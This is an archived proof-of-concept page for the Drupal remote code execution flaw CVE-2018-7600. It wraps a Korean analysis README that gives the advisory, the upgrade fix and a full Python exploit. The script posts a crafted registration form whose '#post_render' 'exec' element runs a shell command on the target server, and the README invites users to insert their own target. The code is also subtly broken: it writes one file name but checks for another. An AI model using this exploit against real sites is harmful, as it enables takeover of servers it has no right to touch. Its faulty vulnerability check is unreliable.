关联漏洞
标题:Drupal 安全漏洞 (CVE-2018-7600)Description:Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。
Description
CVE-2018-7600.
介绍
## IGLOO Corp, Won Chi Hyun Drupal RCE 분석 보고서
Drupal RCE CVE-2018-7600
Dont Forget to Put Your Adress into the Script !
Description:
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
Solution:
Upgrade to the most recent version of Drupal 7 or 8 core.
If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.) If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
```python
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY) | |
|EMAIL > RETURN_ROOT@PROTONMAIL.COM | |
|GITHUB > https://github.com/r3dxpl0it | |
|WEB-PAGE > https://r3dxpl0it.Github.io |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests
def exploit(target):
pass
proxies = {}
verify = False
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
print ( '[*]' + ' requesting post')
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
try:
scan = requests.get(target + 'vulnerable.txt')
if scan.status_code != 200:
print ( ' not vulnerable to cve-2018-7600 exploit \n')
if scan.status_code == 200:
print (' vulnerable to cve-2018-7600 exploit')
print (' url: ' + target + 'vulnerable.txt \n')
except requests.ConnectionError:
print (' target connection timeout')
except Exception as e :
print ('Connction Failed ' + e )
if __name__ == '__main__':
exploit(sys.argv[1])
```
코드분석.
main -> exploit
argv[1] -target argument
scan. status_code 코드 상태값에 따라서 결과값 도출
이벤트 예외처리
文件快照
[4.0K] /data/pocs/fed9d0a4be25c3a27bad119a88f4f41a07a32f2a
└── [2.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →